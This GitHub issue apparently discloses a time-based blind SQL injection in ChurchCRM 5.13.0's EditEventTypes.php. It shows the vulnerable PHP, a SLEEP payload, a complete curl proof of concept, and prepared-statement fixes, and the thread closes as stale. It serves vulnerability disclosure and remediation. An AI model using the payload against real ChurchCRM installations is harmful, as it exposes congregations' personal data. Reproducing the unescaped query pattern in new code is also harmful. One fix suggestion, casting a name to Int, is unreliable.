
Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php #7246


Closed
PenTeZtZMicZ opened this issue Feb 4, 2025 · 5 comments

@PenTeZtZMicZ

Severity:

Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)

  • A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1023)

Authorization Required

  • Administrator or a user with permission to list event types

Description

A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

Exploiting the SQL Injection

Affected Asset:

  • http://<server_ip>/EditEventTypes.php

Vulnerable Source Code:

    // Excerpt from EditEventTypes.php; the opening of the enclosing if statement is not shown.
    $ctid = mb_substr($_POST['Action'], 7);
    $sSQL = "DELETE FROM eventcountnames_evctnm WHERE evctnm_countid='$ctid' LIMIT 1";
    RunQuery($sSQL);
} else {
    switch ($_POST['Action']) {
        case 'ADD':
            $newCTName = $_POST['newCountName'];
            $theID = $_POST['EN_tyid'];
            // Both values are interpolated into the SQL string unescaped.
            $sSQL = "INSERT eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES ('$theID','$newCTName')";
            RunQuery($sSQL);
            break;

Steps to Reproduce:

  1. Navigate to the EditEventTypes endpoint: http://<server_ip>/EditEventTypes.php
  2. Intercept the request using a tool like Burp Suite or manually craft a request.
  3. Modify the newCountName parameter with the following SQL Injection payload:
    4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS
  4. Observe the response time delay, indicating that SQL Injection is possible.

Proof of Concept (PoC):

Exploiting Time-Based Blind SQL Injection

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
    -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 175' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' \
    -H $'Referer: http://<server_ip>/EditEventTypes.php' \
    -H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
    -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
    -b $'<CRM-Cookie>' \
    --data-binary $'EN_tyid=1&EN_ctid=&newEvtName=Church%20Service&newEvtStartTime=10:30:00&newCountName=4\'%20AND%20(SELECT%206419%20FROM%20(SELECT(SLEEP(5)))PYsF)%20AND%20\'KmGS\'\=\'KmGS&Action=ADD' \
    $'http://<server_ip>/EditEventTypes.php'

Observed Response:

  • The request results in a 5-second delay, confirming the SQL Injection vulnerability.

Impact:

  • Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and admin tokens.
  • Database Manipulation: Attackers can modify, delete, or corrupt important data.
  • Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.

Recommended Fix:

  • Use prepared statements (parameterized queries) to prevent SQL Injection. Example:
    $stmt = $pdo->prepare("INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)");
    $stmt->execute([$theID, $newCTName]);
  • Implement input validation to reject dangerous characters.
  • Apply principle of least privilege to database users to limit damage from SQL Injection.
  • Add data type assignment in PHP for the newCountName variable, e.g. if it is a name, change it to Int.

Environment:

  • Application: ChurchCRM 5.13.0
  • Tested on: Provided Docker in release
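The DELETE and INSERT statements from the excerpt rewritten with PDO prepared statements and validated IDs, as an added example that is neither ChurchCRM's code nor the reporter's fix. It assumes an existing PDO connection $pdo, PHP 8, that the delete action arrives as "DELETE_<id>" (the 7-character prefix matching the mb_substr(..., 7) in the excerpt), and an assumed 50-character limit on the count name.

```php
<?php
// Added example, not ChurchCRM's code: the DELETE and INSERT from the
// vulnerable excerpt as PDO prepared statements with validated IDs.
// Assumes $pdo is a PDO connection to the ChurchCRM MySQL database.
declare(strict_types=1);

const MAX_COUNT_NAME_LEN = 50; // assumed limit; not taken from the schema

function requireIntParam(array $post, string $key): int
{
    // IDs are integer keys: reject anything else instead of quoting it into SQL.
    $value = filter_var($post[$key] ?? null, FILTER_VALIDATE_INT);
    if ($value === false) {
        throw new InvalidArgumentException("$key must be an integer");
    }
    return $value;
}

function handleEventCountAction(PDO $pdo, array $post): void
{
    $action = (string) ($post['Action'] ?? '');

    // Assumed encoding 'DELETE_<id>': 7-char prefix matches mb_substr(..., 7).
    if (str_starts_with($action, 'DELETE_')) {
        $ctid = filter_var(mb_substr($action, 7), FILTER_VALIDATE_INT);
        if ($ctid === false) {
            throw new InvalidArgumentException('Invalid count id in Action');
        }
        $stmt = $pdo->prepare(
            'DELETE FROM eventcountnames_evctnm WHERE evctnm_countid = ? LIMIT 1'
        );
        $stmt->execute([$ctid]);
        return;
    }

    if ($action === 'ADD') {
        $theID = requireIntParam($post, 'EN_tyid');
        $newCTName = trim((string) ($post['newCountName'] ?? ''));
        // Length check is business validation; the bound parameter is what
        // keeps quotes and SLEEP() in the name from reaching the SQL parser.
        if ($newCTName === '' || mb_strlen($newCTName) > MAX_COUNT_NAME_LEN) {
            throw new InvalidArgumentException('Count name must be 1-50 characters');
        }
        $stmt = $pdo->prepare(
            'INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)'
        );
        $stmt->execute([$theID, $newCTName]);
    }
}
```

Calling handleEventCountAction($pdo, $_POST) with the reporter's payload in newCountName stores the payload as a literal string and produces no delay, which is the behavioural check to run after applying the fix.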
@PenTeZtZMicZ PenTeZtZMicZ changed the title (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php Feb 4, 2025
@DawoudIO DawoudIO self-assigned this Feb 5, 2025

DawoudIO commented Feb 5, 2025

Let me take a look this week

PenTeZtZMicZ (Author) commented:

I forgot to include, but I went beyond a sleep SQLi test and dumped the database from the SQLi


github-actions bot commented Mar 8, 2025

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.

@github-actions github-actions bot added the Stale label Mar 8, 2025
@DawoudIO DawoudIO removed the Stale label Mar 10, 2025
github-actions bot commented:

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.

@github-actions github-actions bot added the Stale label Apr 10, 2025
github-actions bot commented:

This issue was closed because it has been stalled for 15 days with no activity.

@github-actions github-actions bot closed this as not planned Won't fix, can't repro, duplicate, stale Apr 25, 2025